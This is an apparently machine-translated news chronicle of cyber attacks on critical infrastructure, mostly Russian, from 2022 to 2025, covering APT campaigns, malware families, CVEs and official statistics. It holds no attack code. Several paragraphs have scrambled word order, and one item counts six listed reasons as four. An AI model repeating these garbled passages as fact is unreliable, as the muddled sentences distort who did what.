Security of critical information infrastructure of the Russian Federation
Main article: Security of critical information infrastructure of the Russian Federation
2025
Hackers shut down US-wide emergency alert system
On November 25, 2025, Crisis24 confirmed a large-scale cyber attack on its OnSolve CodeRED platform, which provides emergency warning systems throughout the United States. The incident paralyzed the notification system for state and local authorities, police and fire departments. Read more here.
The infrastructure of the company serving six marine terminals in Russia was subjected to a large-scale DDoS attack
The Port Alliance company announced on its Telegram channel on November 13 that its digital infrastructure was subjected to a large-scale DDoS attack with a simultaneous attempt to hack from abroad. Read more here
' Leave the station immediately ': Hackers break into Los Angeles' IT transport infrastructure and bring threats to subway screens
On October 21, 2025, a system of electronic scoreboards located in the area of 6th Street and Vermont Avenue was hacked in Los Angeles. The attackers displayed an alarming message: "URGENT WARNING. LEAVE THE STATION IMMEDIATELY. RISK OF SELF-DETONATION. " This provoked panic among passers-by and passengers waiting for transport. Soon, photographs from the scene of the incident began to be published in local media. Read more here.
The airline "KrasAvia" was attacked by hackers. The site has been down for several days
On September 18, 2025, KrasAvia Airlines reported a failure in the operation of its information systems. Due to a hacker invasion, the functioning of a number of services has been disrupted, and the air carrier's website has been unavailable for several days. Read more here.
Linux ship management systems have been hacked in Iran. Dozens of tankers idle
At the end of August 2025, it became known that hackers disabled communication systems on board dozens of Iranian oil tankers and cargo ships. This is one of the largest cyber attacks on the country's maritime sector. Read more here
Hackers attack US industrials using fake nondisclosure agreements
Cybercriminals have launched a massive social engineering campaign against American industrial enterprises in critical global supply chains. Attackers use malicious MixShell software, which functions exclusively in the RAM of infected devices and allows hackers to act unnoticed by security systems. The discovery of a new attack scheme was reported by Check Point Research experts in August 2025. Read more here.
Hackers stopped the work of hydroelectric power plants in Poland and told how they did it
In mid-August 2025, it became known that hackers managed to disrupt the work of a hydroelectric power station in Poland. As a result of the invasion, the control systems of the facility were damaged. Read more here.
Cyber espionage group PhantomCore attacked objects of Russian critical infrastructure
From May to July 2025, specialists from the Threat Intelligence department of the Positive Technologies Security Expert Center (PT ESC TI) found more than 180 infected systems in Russian organizations. Malicious activity came from the cybercriminal group PhantomCore and was directed exclusively at the Russian critical infrastructure. PT ESC TI experts identified the victims and notified them of cyber threats before unacceptable events occurred. PT reported this on August 18, 2025. Read more here.
The Russian Datahouse data center network was attacked by hackers. The main trunk router is damaged
The Russian Datahouse data center network was subjected to a coordinated cyber attack, which disrupted the configuration of the main backbone router of the data network. The attack also affected telecom operator Citytelecom, both companies are part of the perimeter of the Filanko group of companies. The incident occurred on the night of August 11, 2025 at about 01:00 Moscow time. Read more here.
Hackers announced the destruction of 7 thousand Aeroflot servers. Computers don't work, company can't refuel planes
On July 28, 2025, Aeroflot's IT infrastructure was subjected to a large-scale cyber attack. As a result of the hacker invasion, the operation of the air carrier's computer systems was disrupted - dozens of flights were canceled. According to the Aviatorshchina Telegram channel, Aeroflot does not have computers, the company cannot refuel planes.
Responsibility for the hack was claimed by attackers from the Silent Crow group, who acted together with the Cyberpartisans BY hackers. According to the organizers of the attack, they were inside the corporate network of Aeroflot for a year, "methodically developing access" and "deepening to the very core of the infrastructure." As a result, cybercriminals were able to "obtain and unload the full array of databases" of flight history, as well as compromise all critical corporate systems, including CREW, Sabre, SharePoint, Exchange, KASUD, Sirax, CRM, ERP, 1C, DLP, etc. In addition, hackers claim that they gained control of employees' personal computers, including senior management. Data from servers was copied, in particular, audio recordings of telephone conversations.
 | About 7,000 servers were destroyed - physical and virtual. The amount of information received is 12 TB of databases, 8 TB of files with Windows Share, 2 TB of corporate mail. All these resources are now unavailable or destroyed, recovery will require perhaps tens of millions of dollars, says Silent Crow. |  |
The Aeroflot website says that the airline's information systems failed. Passengers of canceled flights will have access to a refund or re-issue of tickets after the resumption of services. According to reports, all employees were banned from using corporate mail and work computers until special notice. On behalf State Offices of Public Prosecutor Russia of the Moscow Interregional Transport Prosecutor's Office, they took control of the situation in, Sheremetyevo Airport where more than 80 were detained and about 60 flights were canceled.[1]
Chinese APT group attacks Russian IT contractors with customized malicious utilities
The Center cyber security Solar at "" at the Rostelecom end of February 2025 published the results of a study of harmful the tools that group Space Pirates/Erudite Mogwai uses attacks in-on the Russian IT enterprises that provide services for. public sectors More. here
2024
Cyber attacks hit Russian government agencies using viruses disguised as "Google Tables"
The hacker group Cloud Atlas has begun using cloud services Google to carry out phishing attacks on government agencies. Russia This became known on December 16, 2024 from the data of Positive Technologies. More. here
ART group Cloud Atlas attacks the public sector of Russia and Belarus
INFORMATION SECURITY Positive Technologies the Russian The state organization that discovered phishing the mailing list turned to the threat response department of the security expert center for help. The investigation found Russia Belarus that the incident is part of a campaign against government agencies and that specialists from the PT ESC threat research department have been monitoring since October 2024. Behind is cyber attacks APT group Cloud Atlas with ten years of experience. Positive Technologies announced this on December 12, 2024. More. here
Chinese hackers attack Russian public sector
In early August 2024, it became known that Chinese cybercriminal groups are attacking dozens of computer systems used in Russian government agencies and IT organizations. The malicious campaign, called EastWind, is aimed primarily at stealing official information.
Kaspersky Lab reports the detection of complex targeted attacks on Russian structures. The analysis showed that for the initial infection of the victim's system, attackers send letters with archives attached, inside which there are malicious shortcuts disguised as documents. Clicking on the shortcuts activates the installation of a Trojan program that interacts with cybercriminals using the Dropbox cloud storage.
One of the tools used in the cyber campaign is an updated version of the CloudSorcerer backdoor. The attackers improved this software by adding to it the ability to use the Russian social network LiveJournal as the original command server. This provides additional masking.
In addition to CloudSorcerer, malicious modules used by Chinese-speaking cyber groups APT27 and APT31 are being injected into computers. These malware have extensive functionality: they allow attackers to steal files, monitor actions on the screen and record keystrokes on infected devices.
| | During the detected attacks, malware was used by two groups that speak the same language - Chinese. This is a sign that these groups are working together, actively sharing knowledge and tools for attacks. As practice shows, such interaction allows advanced attackers to work more efficiently, Kaspersky Lab notes[2] | |
FSTEC will oblige government agencies, banks and enterprises of the fuel and energy complex to store information about cyber attacks for 3 years
In early August 2024, it became known that the Federal Service for Technical and Export Control of the Russian Federation (FSTEC) has developed new requirements for the protection of information in government agencies and organizations related to critical information infrastructure (CII ). We are talking about banks, enterprises of the fuel and energy complex (fuel and energy complex), etc.
According to the Kommersant newspaper, the FSTEC document provides for a change in the requirements for the safe storage of data that do not constitute a state secret in government agencies and at KII facilities. Such organizations will need to implement antivirus protection of IT systems, ensure the prevention of intrusions into the infrastructure and control the protection of information in general. In addition, information systems of CII facilities must have the resources necessary to pass traffic twice the volume of conventional indicators.
In the event of a cyber threat, the participants of the market in question need to interact with the state system for detecting computer attacks, as well as with the hosting provider or organization providing communication services. Security threats in the document mean cyber attacks based on the DDoS model.
The new rules also suggest that organizations will have to store information about cyber incidents for three years. Such information should include the date and time when the attack began and ended, the type of threat, its intensity (Gbps), the list of network addresses that are the source of threats, and the protection measures that have been taken.
The general director of the hosting provider RUVDSNikita Tsaplin believes that the proposed measures are necessary for the market, since DDoS attacks have become a regular phenomenon. However, the implementation of the requirements can lead to additional costs for companies due to the need to upgrade hardware and software systems.[3]
Hackers attacked the public sector and companies in Russia through hacked elevator systems
On July 8, 2024, it became known about a large-scale cyber attack on the public sector and companies in Russia, carried out through hacked elevator control systems. The hacker group Lifting Zmiy from Eastern Europe exploited vulnerabilities in SCADA system controllers to penetrate the IT infrastructure of various organizations. Read more here.
Russian state and financial companies are attacked by a new cyber group Lazy Koala
In early April 2024, the information security company Positive Technologies announced the identification of a new hacker group called Lazy Koala, which attacks state and financial companies, as well as medical and educational institutions. Read more here.
"Cyber detectors" from India attacked the Russian oil and gas company
The company "Perspective Monitoring (JSC PM)" at the end of March 2024 published a report entitled "Slumdog millionaires[4]revealed the details of the investigation of one spam attack. The company's experts found that their customers began receiving letters with a malicious attachment in early 2024. According to experts from Perspective Monitoring, the attack affected the infrastructure of a large Russian oil and gas company. Each of the letters included the cloudsecure [.] live domain, which, as it turned out during the investigation, is associated with the Indian cyber group CyberRoot.
| | Basically, the attacks of this group were directed against individuals, - explained Anna Khromova, system analyst at Promising Monitoring. - They tried to find out some confidential information about them in order to further gain access to the infrastructure of the company itself. | |
As a result of the investigation, it was found that CyberRoot employees posed as journalists, business leaders and media personalities in order to enter the trust of their victims. At the same time, they studied information from the social networks of subscribers, friends and family members of the victim in order to create credible fake accounts, with the help of which they pulled out the information necessary for the attack.
The Future Monitoring report says that the main tool of the company is phishing, the purpose of which is to steal the credentials of the leaders of the victim company using malware. The end of the attack is a spy installed on mobile devices of the company's management, which allows you to secretly record events taking place on the phone and send them to the developer's command server. The data collected using such tools is also used to penetrate the infrastructure of the company he manages.
However, in the process of studying the CyberRoot infrastructure, it was discovered that it is part of a more general international hacker attack infrastructure that is associated with Indian Appin spyware developers. In addition to the named companies, the sphere of influence of Indian spy developers ON also includes such organizations as Rebsec, BellTrex and DarkBasin.
Appin became popular in November 2023, when SentinelOne, in conjunction with Reuters, published detailed reviews[5] activities of the company and its subsidiaries. According to international researchers, Appin was founded in 2003 and was engaged in the development of spyware for private detectives from the USA, Great Britain, Switzerland and other countries. The tools of the company called My Commando made it possible to organize hacking of mail, desktop and mobile devices of victims for their further development. However, on December 22 last year, both reports (technical SentinelOne and political Reuters) were withdrawn from publication at the request of Appin's lawyers.
However, initially information about the Appin group was published back in 2011 after hacking their infrastructure by the hacker group Tigers of Indian Cyber. Its representatives claimed that Appin uses students who study with them in courses to create phishing pages.
After the public disclosure of information, the group announced the termination of its activities in 2012. However, in fact, active renaming of companies and the creation of various subsidiaries in the group began. So, in 2012, Rebsec was created, and CyberRoot and BellTrox - in 2013. However, Appin Software Security itself was first renamed Approachinfinite Computer and Security Consulting Grp in 2014, and Adaptive Control Security Global Corp. in 2015. Appin Technology Pvt became Mobile Order Management private limited in 2015 and Sunkissed Organic Farms a year later.
FSTEC named 6 main reasons for successful cyber attacks on enterprises and government agencies
In mid-February 2024, the Federal Service for Technical and Export Control (FSTEC) listed four main reasons for successful hacker attacks on enterprises and government agencies:
- weak user and administrator passwords;
- univariate identification;
- Using default passwords
- active accounts of dismissed employees;
- use of employees' personal devices to access the information infrastructure;
- use of personal messengers and social networks at workplaces.
| | The results of the analysis of computer incidents, which, unfortunately, we have had over the past two years, made it possible to form a rating of the main shortcomings, which very often become prerequisites for the successful implementation of computer attacks, - said Sergey Bondarenko, head of the FSTEC department, speaking about the reasons why IT systems of companies and government agencies are most often hacked. | |
According to Bondarenko, in order to create reliable cyber protection at enterprises and government agencies, it is necessary to inventory information resources, install antivirus programs, protect the perimeter of the information infrastructure and control mail attachments for malicious software.
In mid-February 2024, Russian Deputy Head of the Ministry of Digital Development Alexander Shoitov said that attacks on critical information infrastructure and state systems of the Russian Federation, including banks, had become more complicated. Often hackers, hiding behind simple DDoS attacks, conduct several more to further negatively affect IT systems.
| | We don't even always see, "said Shoitov, speaking at one of the conferences on the topic of information security.[6] | |
2023
Increase in the number of cyber attacks on critical information infrastructure facilities in Russia by 16%
The number of cyber attacks on critical information infrastructure (CII) facilities in Russia in 2023 increased by 16% compared to 2022. This is evidenced by the data of the National Coordination Center for Computer Incidents (NCCCI), which became known in May 2024.
According to Kommersant, citing materials from the center, about a third of KII owner organizations have vulnerable resources in their infrastructure. The most common reason is the use of foreign software without technical support and updates.
| | If we analyze the cases of compromise in closed sessions with the NCCC, it turns out that only a small part of the attacks on KII is associated with complex targeted computer attacks at the level of the ability of foreign special services, "says Pavel Boglay, head of the cybersecurity department of Kryptonit. | |
According to him, the largest number of attacks on CII objects occurs using DDoS attacks, the use of Trojan viruses, as well as when exploiting the human factor (identical passwords, sending important data through third-party instant messengers, etc.).
Experts of the information security company Solar note that the attackers have begun to carefully prepare for attacks, making them more targeted and complex. Also, hackers are actively using cyber intelligence and social engineering tools in the preparation and development of the attack, the group added.
According to a study by Angara Security specialists, about 40% of attacks on the IT infrastructure of departments and CII objects are associated with malicious software, phishing and DDoS attacks on network equipment, sites and servers.
The head of the InfoWatch ARMA product development department, Demid Balashov, stressed that the important conditions for ensuring cyber protection of the CII object are planning the most secure IT infrastructure, creating a defense architecture, applying the Secure-by-Design approach to minimize vulnerabilities and reducing the surface for attacks.[7]
FSB detained a citizen of the Russian Federation who entered the cyber intelligence of Ukraine to attack the Russian KII
FSB officers of the Russian Federation detained in the city of Belovo, Kemerovo Oblast, a Russian citizen who conducted illegal activities against the security of the Russian Federation. The detainee was charged with committing a crime under Art. 275 of the Criminal Code of Russia (high treason in the form of providing other assistance to a foreign organization), a preventive measure was chosen in the form of detention. Information about this was published on the official website of the FSB in a message dated October 31, 2023.
.jpg)
It was established that the detainee, with Internetmessenger the Ukrainian Ukraine computer attacks the help of, entered into a cyber unit operating in the interests of the intelligence services, which included using malicious software information resources from Russia, which led to a violation of the operability of the facilities. country's critical infrastructure
.jpg)
According to the FSB, investigative actions and operational-search measures were carried out in the addresses of residence and work of the defendant in the criminal case, as well as his connections, during which computer equipment and communications were seized, data were obtained confirming his anti-Russian activities.[8]
The most powerful hacker attack fell on the Russian public sector
In the summer of 2023, a powerful hacker attack hit the public sector. On October 24, 2023, Kaspersky Lab told about it.
According to experts from a Russian antivirus company, attackers used phishing emails to steal data from organizations using a new backdoor. It ran a malicious script [NSIS].nsi, which, using several modules, tried to steal data from an infected device.
| | Phishing emails are one of the popular ways for attackers to penetrate the infrastructure. Attackers, as in this case, seek to use plausible legends, legitimate documents and use increasingly complex tactics to hide their activities. Thus, the execution of malicious code using a.nsi script complicates the analysis of malicious activity, "said Timofey Yezhov, an expert on cybersecurity at Kaspersky Lab. | |
As explained in Kaspersky Lab, after launch, the malware checks Internet access and tries to connect to legitimate web resources - foreign media. Then it checks the infected device for software and tools that could detect its presence - for example, sandboxes or virtual environments. If there is at least one, the backdoor stopped its activity. When all the checks were passed, the malware connected to the attackers' server and loaded modules that allowed it to steal information from the clipboard, take screenshots, find user documents in popular extensions (for example, doc,.docx,.pdf,.xls,.xlsx). All data was transferred to the management server.
In mid-August 2023, a second wave of mailings was discovered. The researchers reported that the attackers made some changes to their system, but the infection chain and the bootloader script remained unchanged. It is unclear whether any organisation was affected by these two waves of mailings.[9]
Reuters: IT systems of Russian missile developer "NGO mechanical engineering" hacked by hackers from North Korea
On August 7, 2023, it became known that hackers from North Korea hacked into the IT systems of the Russian company NPO Mechanical Engineering. This enterprise is engaged in the development, production and modernization of complexes of strategic and tactical aviation high-precision weapons of the air-to-surface, air-to-air classes and unified systems of naval weapons, domestic rocket and space technology and electronic equipment. Read more here.
Rostov hacker sentenced to two years in prison for attacks on the websites of banks, fuel and energy complex and telecom companies
On July 4, 2023, the Zheleznodorozhny District Court of Rostov-on-Don sentenced Russian Ivan Bayandin to two years in prison for hacker attacks on the critical information infrastructure of the Russian Federation (KII). Read more here.
Russian Railways website and application not working for three days due to hacker attack
On July 3, 2023, failures began to occur in the work of the official website and mobile application of Russian Railways. The company confirmed the problems, saying that the computer infrastructure was subjected to a hacker attack. Read more here.
The Russian satellite operator Dozor-Teleport was attacked by hackers. There are failures in its work
At the end of June 2023, the Russian satellite operator Dozor-Teleport was attacked by hackers. There are failures in its work. Read more here.
Details of cyber attacks on Russian defense industry enterprises through Microsoft Office revealed
Positive Technologies experts Denis Kuvshinov and Maxim Andreev, with the participation of the Incident response and Threat intelligence PT Expert Security Center teams, prepared a detailed report with an analysis of the Trojan program they called MataDoor. The Trojan was previously spotted in Malwarebytes and Kaspersky Lab reports, where it was named MATAv5 and attributed as part of the activities of the Lazarus hacker group. Positive Technologies experts received a test sample at one of the defense industry enterprises in the fall of 2022.
Presumably, experts associate the initial vector of malware penetration into the enterprise infrastructure with the exploitation of a vulnerability in the Microsoft Internet Explorer component number CVE-2021-40444. Unfortunately, the same component is used in Microsoft Office office applications, which allows you to make an exploit that will start downloading and executing malicious code on the victim's machine. For a successful attack, the victim needs to download the document in DOCX format and open it for editing in Microsoft Office.
Letters containing documents with exploits for the CVE-2021-40444 vulnerability were sent according to researchers to Russian enterprises of the military-industrial complex in August-September 2022. Some of them related in content to the field of activity of the attacked enterprises, some were compiled in such a way as to simply attract the attention of the addressee. However, earlier - in September 2021 - Malwarebytes recorded and investigated similar mailings, but with a different exploit.
Letters with a vulnerability exploit should CVE-2021-40444 prompt the user to activate the document editing mode, which is a prerequisite for working it out. These letters used a specific design of the text, which was supposed to encourage the user to turn on the editing mode and change the font color to a more contrasting one. When editing mode is enabled, malicious code is downloaded and executed from the resource controlled by the attackers. Therefore, if your employees received and viewed letters with non-contrast or other inconvenient design, then it is worth examining your infrastructure using the compromise indicators that the researchers published in the report.
It should be noted that MataDoor is focused on long-term hidden functioning in a compromised system. Its files are named after names similar to legal software installed on infected devices. In addition, a number of samples had a valid digital signature. Also, the identified executables and libraries were processed with a Themida protector to complicate their analysis and detection.
The malware itself is a modular Trojan, which consists of a kernel (orchestrator) and modules (plugins), which just provide all the black work of the malware, depending on which computer it is installed on. MataDoor also provided infrastructure for its modules to transfer data to the control server and asynchronously execute commands loaded from it. Thus, MataDoor can be used both to steal valuable, secret or personal information, and to introduce listening, tracking components and logic bombs. The damage caused by the detected malware and its brothers is still difficult to assess - in each individual case, a thorough investigation must be carried out.
The FSB Cyber Security Center records the growth of cyber attacks through IT contractors. What is recommended to do
Cyber attacks on the information systems of government agencies and subjects of critical information infrastructure (CII) through the supply chain, through the IT infrastructure of contractors in the National Coordination Center for Computer Incidents (NCCC), subordinate to the FSB, are called one of the key trends in 2023.
NKCKI expert Andrei Rayevsky, speaking at an international conference on information security on June 6, explained that often the IT contractor develops and submits a project, but he still has administrator rights for author supervision or further support of the system. And there is a tendency to penetrate the infrastructure of government agencies and KII entities through the administrative rights of the IT contractor.
At the same time, at the legislative level, there are no requirements in the field of information security for the information systems of such contractors. According to the expert, the NKCKI is thinking about providing for requirements at the legislative level, first of all, for IT contractors performing work for government agencies and KII entities.
NCCC, for its part, recommends that customers, within the framework of technical assignments for IT projects, prescribe requirements for the information security of contractors' IT resources. And some serious organizations are already doing this, notes Andrei Rayevsky.
In addition, NCCCA recommends limiting the number of privileged users from among contractors who are assigned to their systems.
There are domestic developments in the market in the field of privileged access tools. Their use becomes very relevant. NKCKI believes that it is worth taking a closer look at these developments.
It is also necessary to monitor the appearance of information about leaks and computer incidents in contractors, and in the event of such leaks in relation to their information resources, it is necessary to ask developers to respond and investigate the causes of leaks.
The number of cyber attacks on the IT infrastructure of Russian Railways in 2 years has grown 20 times
The number cyber attacks for IT infrastructure RUSSIAN RAILWAY January-November 2023 exceeded 600 thousand, which is 20 times more than in 2021. Such figures at the roundtable on facility safety () critical information infrastructure at CUES , transport organized by the Committee on Federation Council (Federation Council) Constitutional Legislation and State Construction, were cited by Dmitry Skachkov, Director Ministry of Transport of the Digital Development Department. More. here
The number of cyber attacks through contractors has grown 2 times. National Center for Computer Incidents - on the main trends of 2022
The National Coordination Center for Computer Incidents (NCCCA) states that the situation in the Russian information space in 2022 was significantly influenced by the conduct of the SVO in Ukraine. An "unprecedented in scale" cyber campaign was launched against Russia, the main goals of which are to disable the information infrastructure and unauthorized access to the IT systems of organizations and enterprises of various sectors of the critical information infrastructure of the Russian Federation. At an industry event on February 7, NKCKI Deputy Director Nikolai Murashov summed up key trends in the field of cyber threats for 2022.
The number of computer attacks on objects of the Russian information infrastructure in 2022 increased significantly. At the same time, there is an increase in the speed of implementation of threats: from the moment information about threats appears - for example, the publication of information about vulnerabilities - it sometimes takes only a few hours to practical implementation.
Increasing the availability of hacker tools: specialized resources regularly publish the source codes of attack software, as well as detailed information about computer incidents for their further analysis.
There are "politicized unfriendly actions" of the international cyber community. Thus, the international community for responding to cyber threats FIRST (Forum of Incident Response and Security Teams) has stopped working with Russian computer incident response centers. This decision confirms the concern expressed earlier by the NCCCA about the declarative nature of the approach of some countries to solving the problem of creating a peaceful, stable and secure ICT environment, Nikolai Murashov believes.
In 2022, the number of attacks through the supplier chain increased: these are integrators, security manufacturers, service providers and other business partners. The number of attacks through contractors over the year increased by 2 times, according to the information available to the NCCCA. Having gained access to the contractor's infrastructure, the attackers find themselves inside the target system.
In 2022, massive attacks on root DNS servers, disconnecting providers from large trunk channels, embedding malware in widely used elements of web pages, and the appearance of malicious code in software updates - both freely distributed and commercial - were recorded.
A feature of DDos attacks in recent months has been a truly large number of their participants. As soon as possible, Telegram channels were formed, in which ordinary people were agitated, participants were instructed, target designation was coordinated, and elements of attacks were distributed.
At the same time, a large amount of DDoS attacks was a cover for more serious impacts. Many computer attacks were aimed at stealing information from the systems of organizations and disabling technological processes.
One of the trends was attacks using ransomware to obtain a ransom. As targets, attackers chose solvent organizations in which data encryption could disrupt the functioning of the main business processes. Therefore, they showed interest in large companies, including industrial enterprises.
Attackers pay great attention to attacks that can have significant public resonance, many data leaks are published. At the same time, according to the NKCKI, in pursuit of information feed and public resonance, attackers often give information from previously leaked leaks as new ones, make compilations from data obtained from public sources. It is not uncommon for small organizations to be hacked for leaking from key government systems or critical information infrastructure facilities. This raises the alleged significance of the event, says Nikolai Murashov.
Separately, the NCCCI notes threats associated with a possible violation of information protection tools. Termination of their support by manufacturers, mass revocation of certificates and other restrictions can have a negative impact on the functioning of the Russian segment of the Internet.
To increase the effectiveness of countering the aggravated threats to information security, it is necessary to activate and consolidate the forces and technical means of the subjects of the critical information infrastructure, Nikolai Murashov noted.
NCCCA also cited statistics on connections to the State system of detection, prevention and elimination of consequences of computer attacks system: 1,277 new participants joined it, and their total number now exceeds 3.5 thousand.
2022
The number of cyber attacks on the Russian public sector has grown several times
In 2022, the number of attacks on the Russian public sector approximately doubled or tripled compared to a year ago. About this "Vedomosti" told an analyst of the data of the cybersecurity monitoring center IZ: SOC of the company "Informzaschita" Shamil Chich (the publication was published on January 16, 2023). Read more here.
Russian hackers XakNet announced the hacking of the Ministry of Finance of Ukraine
The hacker group XakNet announced an operation to hack the Ministry of Finance of Ukraine. The work was carried out for several months, Russian hackers reported on November 22, 2022 in their Telegram channel. Read more here.
Muscovite received 6 years in prison for stealing 93 million rubles from banks as part of a hacker group
In October 2022, Muscovite Artem Mazurenko was sentenced to six years in prison on charges of part 2 of Art. 210 (participation in a criminal community) and part 4 of Art. 159.6 of the Criminal Code of the Russian Federation (fraud in the field of computer information committed by an organized group on an especially large scale). Read more here.
Almost half of Russian departments were subjected to cyber attacks
In the 12-month period, which ended in June 2022, almost half (46.6%) of Russian departments faced cyber attacks. Moreover, in 15% of cases, hacker attacks were repeated. This is stated in the study of the Center for Training Leaders and Teams of Digital Transformation of the RANEPA, published in mid-September 2022.
According to the report, excerpts from which Vedomosti cites, 69.6% of attacks on government agencies were carried out using viruses and ransomware, which mainly penetrate through corporate mail or malicious sites. 51.1% of respondents called DoS and DDoS attacks, 46.7% called phishing attacks, 38% called attacks on the corporate network and password hacking, 30.4% called data leakage and unauthorized access.
The main targets of offenders in 73.9% of cases were sites and web applications of departments. This percentage is explained by the fact that at present most employees and customers interact through digital services.
Only 31.9% of state organizations were not subjected to cyber attacks. One in five organizations found it difficult to answer this question.
The survey involved 302 civil servants of various levels from 75 regions and all federal districts. These were respondents with different official status - from digital transformation leaders and senior managers to ordinary employees. The center clarified that the survey participants were segmented by the level of IT competencies and a number of questions were asked only to specialized specialists (92 people).
According to Luka Safonov, technical director of Sinclit JSC, the percentage of attacks on the Russian public sector is much higher.
| | I think about 90% of Russian departments and structures have recently been attacked by both schoolchildren opposed to Russia and foreign hackers, Safonov said in mid-September 2022. He added that about 10% of the attacks could have been successful.[10] | |
Chinese hackers attacked Russian defense enterprises
Chinese-language cyber group attacks defense enterprises state agencies and in, Russia countries Eastern and. Europe This was announced Afghanistan on August 8, 2022 by "."Kaspersky Lab
In total, during the investigation, experts revealed attacks on more than a dozen organizations. Presumably, the target of the attackers was cyber espionage. Experts suggest that the identified series of attacks may be related to the activities of the Chinese-speaking cyber group TA 428. It used new modifications of previously known backdoors.
In some cases, the attackers managed to completely seize the IT infrastructure. To do this, they used well-prepared phishing emails. They contained internal information that was not available in public sources at the time of its use by cybercriminals, including F.I.O. employees working with confidential information, and internal code names of projects. Microsoft Word documents with malicious code exploiting the CVE-2017-11882 vulnerability were attached to phishing emails. It allows the malware to gain control of the infected system without additional actions from the user, the user is not even required to enable macro execution.
As the main tool for developing the attack, attackers used the Ladon utility with the ability to scan the network, search and exploit vulnerabilities, and steal passwords. At the final stage, they seized the domain controller and then gained full control over the workstations and servers of interest to the attackers of the organization. Having received the necessary rights, the attackers proceeded to search and download files containing confidential data to their servers deployed in different countries. These same servers were used to control malware.
| | Targeted phishing remains one of the most pressing threats to industrial enterprises and government agencies. The series of attacks we discovered is not the first, apparently, in a malicious campaign. Since attackers are successful, we assume that such attacks could happen again in the future. Enterprises and state organizations need to be on the lookout and carry out appropriate work to prepare for repelling complex targeted threats, "said Vyacheslav Kopeitsev, senior expert at Kaspersky ICS CERT. | |
Russian-speaking hackers from Killnet paralyzed the work of several Lithuanian government agencies
Hackers from the Killnet group, who warned the Lithuanian authorities about the upcoming large-scale cyber attacks due to blocking the railway transit of goods through the country to the Kaliningrad region, kept their promise and attacked Lithuanian state structures. This became known on June 27, 2022. Read more here.
APT31 cyber group attacks Russian fuel and energy complex and media
In April 2022, PT Expert Security Center specialists from Positive Technologies identified an attack on a number of Russian organizations (media and energy companies) using a malicious document during daily threat monitoring. Representatives of Positive Technologies reported this to TAdviser on August 4, 2022. Read more here.
Presidential administration: 90% of Russia's public sector infrastructure was subjected to cyber attacks
Since the start of the Russian special operation in Ukraine (June 24, 2022), about 90% of the infrastructure of the public sector of the Russian Federation has faced cyber attacks to one degree or another. This was announced on June 16, 2022 by the head of the department of the Presidential Administration of the Russian Federation for the development of information and communication technologies and communication infrastructure Tatyana Matveeva. Read more here.
The website of the Ministry of Construction of Russia was hacked. Hackers blackmail employees with data disclosure
On June 5, 2022, the website of the Ministry of Construction, Housing and Communal Services of Russia was hacked. As a result of a hacker attack, a message appeared on the main page of the department's resource that it was hacked by the team DumpForums.com. Read more here.
Cyber group, attacking the public sector, electricity and aerospace industry in Russia discovered
On May 17, 2022, the company Positive Technologies announced that its expert center (safety PT Expert Security Center, PT ESC) had discovered another cybercriminal grouping. Russia malefactors attacked In at least five organizations, in - Georgia one, and the exact number of victims in is still Mongolia unknown. Among the goals attacking identified by Positive Technologies specialists state institutions are enterprises from aviation space and industries electrical power. More. here
China initiated a cycle of hacker attacks on Russian authorities
On May 4, 2022, it became known that China he went against Russia and initiated a cycle on the hacker attacks Russian authorities, analysts of Google the Threat Analysis Group (TAG) team report. According to their report, computer the Curious Gorge group attacks more actively than others.
Hackers included in this group over and over again attack government, military, logistics and production organizations in Russia. The Google TAG report was published on May 3, 2022, and it separately indicated that the last time Chinese hackers from Curious Gorge showed themselves at the end of April 2022, attacking the networks of several Russian defense contractors and manufacturers, as well as the Russian Ministry of Foreign Affairs and the Russian logistics company. Its name is not given in the report.
What exactly encourages hackers to attack Russian objects remained unknown at the time of publication of the material. The goals of the Curious Gorge group are also various companies in Ukraine and Central Asia.
According to Google TAG, Chinese authorities may be behind Curious Gorge. She is credited with strong links with the People's Liberation Army Strategic Support Force of China (PLA MTR). This is a separate type of armed forces within the PLA, and the cyber sphere is included in the area of activity of the MTR.
The Chinese threat to Russian networks at the beginning of May 2022 is not only Curious Gorge. At the end of April 2022, the Bronze President group chose Russia as its target.
In the reports of various companies specializing in, cyber security this group takes place under several names, including Mustang Panda, TA416 and RedDelta. The first mention of her activities appeared in 2018, and most often traces of her crimes were found countries in Asia.
| | This suggests that the attackers received updated tasks that reflect the changing intelligence gathering requirements data of the People's Republic of China, the researchers say. | |
Secureworks experts suggest that Russia's entry into the field of view of the Bronze President may indicate "an attempt by China to inject modern malware into the computer systems of Russian officials." They discovered and analyzed the malicious executable file Blagoveshchensk - Blagoveshchensk - Blagoveshchensk Border Detachment.exe distributed by the group, which was disguised as a PDF file and encrypted. Inside it was a bootloader of PlugX malware.
Blagoveshchensk is a city that lies near the border with China. It houses parts of the Russian army.
When launched, the file displays a decoy document written for some reason in English, which describes the situation with refugees and EU sanctions. In the meantime, the user who launched the file reads the document, on his computer in the background, the PlugX malware is downloaded from the command and control server. PlugX is a remote access Trojan used to steal files, execute remote commands, install backdoors, and deploy additional malware. This is one of the Bronze President tools - hackers also use the malware Cobalt Strike, China Chopper, RCSession and ORat.
China is one of the countries in the world that have not officially joined the anti-Russian sanctions imposed due to a special operation in Ukraine. At the same time, the PRC does not side with Russia and demonstrates neutrality in this matter. The attacks of hackers from Bronze President and Curious Gorge on Russian networks are another major confirmation that China may have its own interest in confronting Russia and the rest of the world[11].
Russian hackers suspected of cyber attacks on German renewable power companies
Three the German renewable companies to power have been hacked due to countries the Russian oil waivers. This became known on April 27, 2022. More. here
Positive Technologies: government agencies are the worst protected from cyber attacks
In Russia, state bodies are worst protected from hacker attacks, according to Positive Technologies, a company specializing in information security technologies. Experts made the corresponding statement in mid-April 2022.
| | Federal ministries and departments show the least degree of readiness for cyber attacks. Officials are now forced to live in the paradigm of the past time - said Maxim Filippov, director of business development at Positive Technologies in Russia. | |
According to him, the procurement procedures are defined 44-FZ, 223-FZ. In order to purchase some kind of means of protection, which by April 2022 has become more relevant than ever, or to allow experts to their facilities to conduct a retrospective investigation or reconfiguration of means of protection, they need to go through a large number of difficult procedures. They do not have time to respond, and the dynamics and types of attacks change every minute. If you do not quickly detect and respond, then there will be nothing to protect, Filippov said.
He also pointed out that state structures and companies with state participation are opponents of information exchange with experts about past cyber attacks.
| | Government agencies are afraid of publicizing these incidents even in the circle of expert companies. This is not at all clear to me personally. In the current environment, collaboration with experts who are focused on ensuring the security of infrastructure in cyberspace, they need as air, he added. | |
Positive Technologies Business Development Director cited data according to which the activity on cyber attacks on companies and government agencies in the Russian Federation from late February to mid-April 2022 increased 100 times, while banks were most prepared for cyber attacks, and least of all - federal departments and companies with state participation.[12]
Departmental website of the Ministry of Emergency Situations was subjected to a hacker attack
